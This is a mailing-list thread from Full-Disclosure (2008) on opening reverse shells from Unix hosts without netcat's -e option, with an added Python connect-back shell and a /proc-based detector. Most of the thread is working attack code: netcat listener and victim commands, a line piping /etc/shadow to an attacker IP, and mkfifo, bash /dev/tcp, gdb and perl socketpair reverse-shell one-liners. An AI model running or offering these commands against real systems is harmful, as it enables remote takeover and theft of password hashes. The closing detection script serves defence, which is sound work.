[Full-disclosure] Reverse Shell Without Enabling Netcat's GAPING_SECURITY_HOLE

2008-09-19 Thread 545945
 Recently a friend of mine asked me a seemingly simple question: what
is the easiest method to get a reverse shell from a *nix based system using
Netcat?  He then added a caveat, that he did not want to worry about
recompiling the source to enable the GAPING_SECURITY_HOLE option that
allows you to bind a shell using -e.  My first thought was to say "Dude, go
check Google and stop bothering me with this piddly shit", however I have in
the past had this same discussion with others and trying to construct a
Google search string and get meaningful results on this subject can prove
very irritating.  Because of this I gave in and told him the method I use,
which is laid out below.  I then had the thought that I should post it
somewhere else so it was a little easier for the next person to find.  I say
somewhere else because I can only assume that I am not the first person to
post this method.

 While the method below does not provide a TRUE interactive shell, it
is the next best thing and is more than suitable for most hacking
endeavours, including simple interactive steps like setting passwords.  I
know there are other methods out there but I like this one as it provides an
easy method without worrying if any particular scripting language was
installed or the proper options were compiled in with the default shell.
There will undoubtedly be debate on what the best ports are to use and
whether or not this is even a recommended way to do things.  I chose ports
53 & 80 as they are the ones that I find have the most success of getting
out of a network untouched.  As with all things, any number of factors can
get in the way of proper communication using this method.


STEP (1)

On the attacker host open a terminal window that you want to receive the
output of your commands in and run.
 nc -k -v -l 80


STEP (2)

On the attacker host open a terminal window that you want to enter in your
commands and run.
 nc -k -v -l 53


STEP (3)

On the victim host run.
 while true ; do nc Attacker_IP 53 | /bin/sh ; done

You should then see a message appear in the window opened in STEP (2)
similar to: Connection from Victim_IP port 53 accepted


NOTE:  I use the -k option and while loops in these steps to ensure
that if there are any intermittent communication issues I don't have to
re-establish any of the sessions.


 Assuming that there are no communication issues like firewalls,
routing, DNS, PEBCAK errors, etc. getting in the way, then the command you
entered in STEP (3) will connect to the session started in STEP (2).  "Great,
now what?" you ask.  Well, all you do is enter the commands you want to run
in the STEP (2) window using the formatting below and the output will
display in the window opened for STEP (1).

Syntax :   command | nc Attacker_IP 80

Example:   cat /etc/shadow | nc 10.10.10.10 80


There are lots of variations on this using multiple hosts and single ports
but I leave that up to you to experiment.  That's it and happy hunting...

--545945
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
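The method above keeps the shell and nc as two processes joined by a pipe, which is why it is not a true interactive shell. The alternative the post sets aside, a scripting language pointing the shell's own stdin, stdout and stderr at the socket (what nc -e does internally), is shown here as an added example in Python; it is not code from the post. It runs both ends on loopback in one process tree: run_demo() listens as the attacker, forks a child that calls connect_shell() as the victim, sends one command and returns what the shell wrote back. /bin/sh, the ephemeral loopback port and the 10-second timeouts are assumptions of the example.

```python
"""Shell-to-socket without nc -e: connect, dup2() the socket onto fd 0/1/2,
exec the shell.  Both ends run on loopback so the demo is self-contained.
Added example, not code from the post; /bin/sh and the 10 s timeouts are
assumptions."""
import os
import socket


def connect_shell(host, port, shell="/bin/sh"):
    """Victim side.  Connect back to host:port, point stdin/stdout/stderr at
    the socket and replace this process with the shell.  Does not return on
    success; this is the work nc -e would otherwise do for us."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    for fd in (0, 1, 2):
        os.dup2(s.fileno(), fd)   # fd 0/1/2 now share the connected socket
    os.execv(shell, [shell])      # s.fileno() itself is close-on-exec


def run_demo(command, timeout=10):
    """Attacker side.  Listen on an ephemeral loopback port, fork a child that
    calls connect_shell(), send one command followed by `exit`, and return
    everything the shell wrote back (stdout and stderr both ride the socket)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    srv.settimeout(timeout)
    port = srv.getsockname()[1]

    pid = os.fork()
    if pid == 0:                  # child: play the victim
        try:
            connect_shell("127.0.0.1", port)
        finally:
            os._exit(1)           # only reached if connect() or exec failed

    conn, _ = srv.accept()
    srv.close()
    conn.settimeout(timeout)
    conn.sendall(("%s\nexit\n" % command).encode())
    output = b""
    while True:
        chunk = conn.recv(4096)
        if not chunk:             # shell exited, kernel closed the socket
            break
        output += chunk
    conn.close()
    os.waitpid(pid, 0)
    return output.decode(errors="replace")


if __name__ == "__main__":
    print(run_demo("id; uname -a"), end="")
```

In the field the attacker side is just the nc listener from STEP (1) and the victim side is a one-liner calling connect_shell() with the attacker's address. The shell you get is still non-interactive (no controlling tty), the same limitation the post notes; wrapping it in setsid with a pty is what fixes that.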

Re: [Full-disclosure] Reverse Shell Without Enabling Netcat's GAPING_SECURITY_HOLE

2008-09-19 Thread Kurt Buff
On Fri, Sep 19, 2008 at 3:01 PM, 545945 wrote:
  Recently a friend of mine asked me a seemingly simple question: what
 is the easiest method to get a reverse shell from a *nix based system using
 Netcat?  He then added a caveat, that he did not want to worry about
 recompiling the source to enable the GAPING_SECURITY_HOLE option that
 allows you to bind a shell using -e.  My first thought was to say "Dude, go
 check Google and stop bothering me with this piddly shit", however I have in
 the past had this same discussion with others and trying to construct a
 Google search string and get meaningful results on this subject can prove
 very irritating.  Because of this I gave in and told him the method I use,
 which is laid out below.  I then had the thought that I should post it
 somewhere else so it was a little easier for the next person to find.  I say
 somewhere else because I can only assume that I am not the first person to
 post this method.

snip

Or you could just grab cryptcat and be done with it, if I understand
what you're after.



Re: [Full-disclosure] Reverse Shell Without Enabling Netcat's GAPING_SECURITY_HOLE

2008-09-19 Thread 545945
Funny, I actually saw your reply before my original post with the
method in it was posted.  The question was he wanted the easiest
method using Netcat.  On a system that you may not have a lot of
access to (i.e. one you are running an exploit against), downloading
cryptcat and running that would be a lot harder since it is not
included in any of the standard *nix distros, whereas Netcat usually
is.  So the goal is to get a reverse shell using as little effort as
possible, and if the ability exists without having to run a bunch of
commands on a remote server then why not.  But you are correct; as I
stated in the original post, there is more than one way to do this.
In the end it is the results that make them happy; getting there is
one's own choice.



On Fri, Sep 19, 2008 at 6:28 PM, Kurt Buff wrote:

 snip


Re: [Full-disclosure] Reverse Shell Without Enabling Netcat's GAPING_SECURITY_HOLE

2008-09-19 Thread Davide Guerri
mkfifo /tmp/a; while true; do { sleep 1; nc IP 80 </tmp/a | /bin/bash >/tmp/a; }; done

On 20 Sep 2008, at 01:25, 545945 wrote:

 snip


Re: [Full-disclosure] Reverse Shell Without Enabling Netcat's GAPING_SECURITY_HOLE

2008-09-19 Thread Robert McKay
If you're using a non-crippled bash (anything non-Debian/Ubuntu) you
can connect a shell to a TCP socket directly like this:

On controlhost:

nc -l -p 31337

On slavehost:

bash -c 'exec 3<>/dev/tcp/controlhost.com/31337 ; bash <&3 >&3 2>&3' &

If you are using a crippled (Debian) bash you have to jump through an
extra hoop:

On slavehost:

nc controlhost.com 31337 <>/dev/ptyp0 1>&0 2>&0 &
setsid bash <>/dev/ttyp0 >&0 2>&0

Now these days some systems may not have the old /dev/ttypX style
devices (the new /dev/ptmx stuff requires you to do an ioctl to poke
it into working, which is tricky to do from bash although could be
done through gdb or a scripting language easily enough).

If you're going to use gdb though.. there are an unlimited number of
ways to skin the cat. Possibly the simplest is just to use
socketpair() to create a pair of connected sockets.

$ gdb bash
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(no debugging symbols found)
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x80606d1
(gdb) run
Starting program: /bin/bash
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Breakpoint 1, 0x080606d1 in main ()
(gdb) call malloc(2)
$1 = 135237640
(gdb) call socketpair(1,1,0,$1)
$2 = 0
(gdb) continue
Continuing.
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
$ ls -l /proc/self/fd
total 0
lrwx------ 1 rm rm 64 2008-09-20 03:57 0 -> /dev/pts/11
lrwx------ 1 rm rm 64 2008-09-20 03:57 1 -> /dev/pts/11
lrwx------ 1 rm rm 64 2008-09-20 03:57 2 -> /dev/pts/11
lr-x------ 1 rm rm 64 2008-09-20 03:57 3 -> pipe:[122802]
l-wx------ 1 rm rm 64 2008-09-20 03:57 4 -> pipe:[122802]
lr-x------ 1 rm rm 64 2008-09-20 03:57 5 -> /bin/bash
lrwx------ 1 rm rm 64 2008-09-20 03:57 6 -> socket:[122839]
lrwx------ 1 rm rm 64 2008-09-20 03:57 7 -> socket:[122840]
lr-x------ 1 rm rm 64 2008-09-20 03:57 8 -> /proc/19126/fd
$

As you can see we have a nice extra pair of connected sockets here:

$ nc controlhost.com 31337 <&6 >&6 2>&6 &
[1] 19416

$ setsid bash -i <&7 >&7 2>&7 &
[2] 19468
$ exit
exit

Program exited normally.
(gdb) quit

(You now have a bash shell connected to controlhost)

Okay, so that's a bit fiddly and does depend on gdb -- but I'm sure it
wouldn't be difficult to script up.

You could do something similar with a perl script or a small C program
-- all you need to do is call socketpair() and then fork off nc and
bash.

on slavehost:

$ perl -e '$^F=100; socketpair(rd,wr,1,1,0); if (fork()) {
exec("setsid bash -i <&3 >&3 2>&3"); } else { exec("nc
controlhost.com 31337 <&4 >&4 2>&4"); }' &
[1] 20768

I'm sure the same thing could be rigged up in most scripting languages.

Rob.

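The /proc/self/fd listing above is also the artefact a defender looks for: a shell whose fd 0/1/2 point at a socket:[inode], or, for the nc ... | /bin/sh form from the original post, a shell whose stdin pipe is shared with a netcat process. The checker below is an added example, not code from the thread. SAMPLE_LISTING is constructed to mirror the listing above as it would look after setsid bash -i <&7 >&7 2>&7, and the SHELLS and NETCATS process-name sets are assumptions.

```python
"""Find shells wired to a socket, the artefact visible in /proc/<pid>/fd.
Added example, not code from the thread.  SHELLS and NETCATS are assumed
process names; SAMPLE_LISTING is constructed to mirror the listing above."""
import os
import re

SHELLS = {"sh", "bash", "dash", "ash", "zsh", "ksh"}                  # assumption
NETCATS = {"nc", "netcat", "ncat", "nc.openbsd", "nc.traditional"}   # assumption
SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")
PIPE_RE = re.compile(r"^pipe:\[(\d+)\]$")


def parse_ls_l(listing):
    """Turn `ls -l /proc/<pid>/fd` output into {fd: link target}."""
    targets = {}
    for line in listing.splitlines():
        m = re.search(r"\s(\d+) -> (\S.*)$", line)
        if m:
            targets[int(m.group(1))] = m.group(2)
    return targets


def suspicious_stdio(fd_targets, pipe_holders=None):
    """Reasons one process's stdio looks like a reverse shell.
    fd_targets:   {fd: readlink target} for that process.
    pipe_holders: {pipe inode: set of comm names of every process holding it};
                  catches `nc host port | /bin/sh`, where sh's stdin is a plain
                  pipe whose other end belongs to netcat."""
    reasons = []
    for fd in (0, 1, 2):
        target = fd_targets.get(fd, "")
        if SOCKET_RE.match(target):
            reasons.append("fd %d is %s" % (fd, target))
            continue
        m = PIPE_RE.match(target)
        if m and pipe_holders:
            peers = pipe_holders.get(int(m.group(1)), set()) & NETCATS
            if peers:
                reasons.append("fd %d is %s shared with %s"
                               % (fd, target, ",".join(sorted(peers))))
    return reasons


def read_fds(pid):
    """Live {fd: target} for one pid; empty when unreadable (EPERM, gone)."""
    out = {}
    try:
        for name in os.listdir("/proc/%d/fd" % pid):
            try:
                out[int(name)] = os.readlink("/proc/%d/fd/%s" % (pid, name))
            except OSError:
                pass
    except OSError:
        pass
    return out


def comm(pid):
    try:
        with open("/proc/%d/comm" % pid) as f:
            return f.read().strip()
    except OSError:
        return ""


def scan_proc():
    """Live sweep: [(pid, comm, reasons)] for shells with suspicious stdio."""
    if not os.path.isdir("/proc"):
        return []
    procs = {pid: (comm(pid), read_fds(pid))
             for pid in (int(n) for n in os.listdir("/proc") if n.isdigit())}
    pipe_holders = {}             # pipe inode -> names of all holders
    for name, fds in procs.values():
        for target in fds.values():
            m = PIPE_RE.match(target)
            if m:
                pipe_holders.setdefault(int(m.group(1)), set()).add(name)
    hits = []
    for pid, (name, fds) in procs.items():
        if name in SHELLS:
            reasons = suspicious_stdio(fds, pipe_holders)
            if reasons:
                hits.append((pid, name, reasons))
    return hits


# Constructed sample, shaped like the listing above once bash -i owns socket 7.
SAMPLE_LISTING = """\
total 0
lrwx------ 1 rm rm 64 2008-09-20 03:57 0 -> socket:[122840]
lrwx------ 1 rm rm 64 2008-09-20 03:57 1 -> socket:[122840]
lrwx------ 1 rm rm 64 2008-09-20 03:57 2 -> socket:[122840]
lr-x------ 1 rm rm 64 2008-09-20 03:57 3 -> /proc/19468/fd
"""

if __name__ == "__main__":
    print(suspicious_stdio(parse_ls_l(SAMPLE_LISTING)))
    for pid, name, reasons in scan_proc():
        print(pid, name, "; ".join(reasons))
```

suspicious_stdio() is pure, so it can be run over a saved listing from a forensic image; scan_proc() does the live walk of /proc, building the pipe-inode index first so a pipe shared between nc and sh can be matched. It returns nothing on hosts without /proc and silently skips processes it cannot read, so run it as root for a real sweep. The /dev/tcp and pty variants in the reply above put a socket or a pty on the shell's stdio; only the socket case is flagged here.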